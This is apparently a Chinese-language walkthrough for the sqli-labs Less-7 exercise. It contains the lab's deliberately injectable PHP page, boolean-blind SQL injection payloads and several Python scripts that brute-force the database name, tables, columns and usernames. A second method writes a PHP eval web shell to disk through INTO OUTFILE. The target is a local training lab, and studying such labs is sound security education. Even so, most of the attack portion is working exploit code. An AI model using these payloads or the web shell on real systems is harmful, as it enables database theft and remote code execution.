<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-7 Dump into Outfile</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Turns off all PHP error reporting: a failed query produces no warning on the
// page, so the visitor only ever sees one of the two fixed messages below.
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
// Raw query-string value; nothing below validates, casts or escapes it.
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
// Appends the unmodified id to result.txt (path is relative to the script's
// working directory), one "ID:" line per request.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
// $id is interpolated straight into the SQL string inside (('...')); this is the
// lesson's intended injection point. Legacy ext/mysql functions (mysql_query /
// mysql_fetch_array) are used, which were removed in PHP 7.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
// The response leaks exactly one bit: a matching row prints the "You are in"
// text, anything else (no row, or a query error) prints the syntax-error text.
if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
echo 'You have an error in your SQL syntax';
// The real MySQL error is kept out of the page (left commented out), so the
// message above is static and does not distinguish "no row" from "bad query".
//print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-7.jpg" /></center>
</body>
</html>
第一种方法:布尔盲注
?id=1(返回这样: You are in.... Use outfile......)
?id=1 and 1=2(正常回显,不是数字型,现在还哪有什么数字型啊,都可以不试了)
?id=1'(报错)
?id=1'--+(依然报错)
?id=1"(正常)
?id=1" and "1"="1(正常)
?id=1" and "1"="2(正常,不对劲,不是双引号)
?id=1')--+(错误)
?id=1'))--+(正常)
?id=1')) and 1=1--+(正常)
?id=1')) and 1=2--+(错误)
这里因为除了两个页面以外,其他什么都不显示,所以用bool盲注测试。(这里只演示爆破语句,python脚本附在后面)
?id=1')) and length((select database()))=8--+(回显正常,说明当前数据库名的长度是8)
?id=1')) and ascii(substr((select database()),1,1))=115--+(回显正常,说明数据库名字第一个字母的ASCII码为115)
?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())=4--+(爆破表的个数)
?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6--+(爆破表名的长度)
?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1--+(爆破表名)
?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())=3--+(爆列数)
?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1))=2--+(爆破列名长度)
?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),0,1))=1--+(爆破列名)
接下来就是爆破数据了:
?id=1')) and (select count(username) from users)=13--+(爆破有多少条数据 #是从0开始的# )
?id=1')) and length(substr((select username from users limit 0,1),1))=1--+(判读数据长度)
?id=1')) and ascii(substr((select username from users limit 0,1),1,1))=1--+(爆破数据)
判断数据库名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Text the lab prints when the injected condition is true; it is the only signal
# this script reads, because Less-7 shows no query output at all.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = 'http://localhost/sqli-labs-master/Less-7'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}


def is_true_page(query_string):
    """Fetch url + query_string through the shared session and report whether the 'true' text appears."""
    page = response.get(url + query_string, headers=headers).text
    return TRUE_PAGE_TEXT in page


LENGTH_QUERY = "?id=1')) and length((select database()))={}--+"

# One request per candidate length, 1..29; the first match is printed and the loop ends.
for candidate in range(1, 30):
    if is_true_page(LENGTH_QUERY.format(candidate)):
        print(candidate)
        break
print("ok")
爆破数据库名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

CHAR_QUERY = "?id=1')) and ascii(substr((select database()),{},1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


def char_at(position):
    """Try ASCII codes 1..127 for the character at `position` (1-based); '' when none matched."""
    for code in range(1, 128):
        if is_true_page(CHAR_QUERY.format(position, code)):
            return chr(code)
    return ""


print(ord('s'))
database_length = 8
# Characters are recovered left to right; a position with no match contributes nothing.
database_name = "".join(char_at(position) for position in range(1, database_length + 1))
print(database_name)
爆破表的个数
#coding:utf-8
import requests
from bs4 import BeautifulSoup

url = "http://localhost/sqli-labs-master/Less-7/"
database_name = "security"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response = requests.session()

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"
COUNT_QUERY = "?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


# Candidates 1..19 are tried in order; the first match is kept.
candidate = 1
while candidate < 20:
    if is_true_page(COUNT_QUERY.format(candidate)):
        table_number = candidate
        break
    candidate += 1
# table_number is bound only inside the loop; with no match this line raises NameError.
print("table numbers:", table_number)
爆破表名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

LENGTH_QUERY = "?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


table_number = 4
# Rows 0..3 of the table list; for each, lengths 1..49 are tried until one matches.
for row in range(0, 4):
    table_name = ""
    for candidate in range(1, 50):
        if is_true_page(LENGTH_QUERY.format(row, candidate)):
            tablelen = candidate
            break
    # tablelen keeps the previous row's value (or is unbound on the first row) when nothing matched.
    print(tablelen)
爆破表名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

LENGTH_QUERY = "?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+"
CHAR_QUERY = "?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


def char_at(row, position):
    """Try ASCII codes 1..127 for one character of the name in `row`; '' when none matched."""
    for code in range(1, 128):
        if is_true_page(CHAR_QUERY.format(row, position, code)):
            return chr(code)
    return ""


table_number = 4
for row in range(0, 4):
    # Step 1: length of this row's name (first matching candidate in 1..49).
    for candidate in range(1, 50):
        if is_true_page(LENGTH_QUERY.format(row, candidate)):
            tablelen = candidate
            break
    print(tablelen)
    # Step 2: positions 0..tablelen are queried one character at a time.
    table_name = "".join(char_at(row, position) for position in range(0, tablelen + 1))
    print("表名:", table_name)
爆破列数:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

COUNT_QUERY = "?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


# Candidates 1..29 in order; the first match is kept.
candidate = 1
while candidate < 30:
    if is_true_page(COUNT_QUERY.format(candidate)):
        column_number = candidate
        break
    candidate += 1
# column_number is unbound (NameError here) if no candidate matched.
print("列数:", column_number)
爆破列名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

LENGTH_QUERY = "?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


column_number = 3
# For each column row 0..2, lengths 1..49 are tried; the first match is printed (1-based column index).
for num in range(0, column_number):
    for candidate in range(1, 50):
        if not is_true_page(LENGTH_QUERY.format(num, candidate)):
            continue
        print("{}列名长度为:".format(num + 1), candidate)
        break
爆破列名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

LENGTH_QUERY = "?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+"
CHAR_QUERY = "?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),{},1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


def char_at(row, position):
    """Try ASCII codes 1..127 for one character of the name in `row`; '' when none matched."""
    for code in range(1, 128):
        if is_true_page(CHAR_QUERY.format(row, position, code)):
            return chr(code)
    return ""


column_number = 3
for num in range(0, column_number):
    # Step 1: length of this column's name (first match in 1..49).
    for candidate in range(1, 50):
        if is_true_page(LENGTH_QUERY.format(num, candidate)):
            column_length = candidate
            break
    # Step 2: one character per position 1..column_length.
    column_name = "".join(char_at(num, position) for position in range(1, column_length + 1))
    print("第{}列的列名:".format(num + 1), column_name)
爆破数据条数:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

COUNT_QUERY = "?id=1')) and (select count(username) from users)={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


# Candidates 1..498 in order; the first match is printed and the loop ends.
for candidate in range(1, 499):
    if not is_true_page(COUNT_QUERY.format(candidate)):
        continue
    print(candidate)
    break
爆破数据内容:
#coding:utf-8
import requests
from bs4 import BeautifulSoup

# Marker text of the lab's "condition true" page.
TRUE_PAGE_TEXT = "You are in.... Use outfile......"

response = requests.session()
url = "http://localhost/sqli-labs-master/Less-7/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}

LENGTH_QUERY = "?id=1')) and length(substr((select username from users limit {},1),1))={}--+"
CHAR_QUERY = "?id=1')) and ascii(substr((select username from users limit {},1),{},1))={}--+"


def is_true_page(query_string):
    """Return True when the page fetched for url + query_string contains the marker text."""
    return TRUE_PAGE_TEXT in response.get(url + query_string, headers=headers).text


def char_at(row, position):
    """Try ASCII codes 1..127 for one character of the value in `row`; '' when none matched."""
    for code in range(1, 128):
        if is_true_page(CHAR_QUERY.format(row, position, code)):
            return chr(code)
    return ""


Numbers = 13
for row in range(0, Numbers):
    # Step 1: length of this row's value (first match in 1..29).
    for candidate in range(1, 30):
        if is_true_page(LENGTH_QUERY.format(row, candidate)):
            shujv_length = candidate
            break
    # Step 2: one character per position 1..shujv_length.
    shujv = "".join(char_at(row, position) for position in range(1, shujv_length + 1))
    print("第{}条数据:".format(row + 1), shujv)
第二种方法:SQL注入写shell脚本
1、获取绝对路径:
要写shell那么我们就要知道文件的绝对路径。因为靶场是我们自己配置的,所以可以知道。再有就是可以在less1~6中用@@datadir查询。
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir--+
我这里是:E:\PHPStudy\phpstudy_pro\WWW\sqli-labs-master\Less-7
id=1')) and (select count(*) from mysql.user)>0 --+
用这个判断是否返回正常,如果正常就有文件读取权限,反之则没有,需要配置。
2、写shell
?id=1')) union select 1,2,'<?php @eval($_POST["shell"]); ?>' into outfile "E:\\PHPStudy\\phpstudy_pro\\WWW\\test.php"--+
然后蚁剑连一下就好了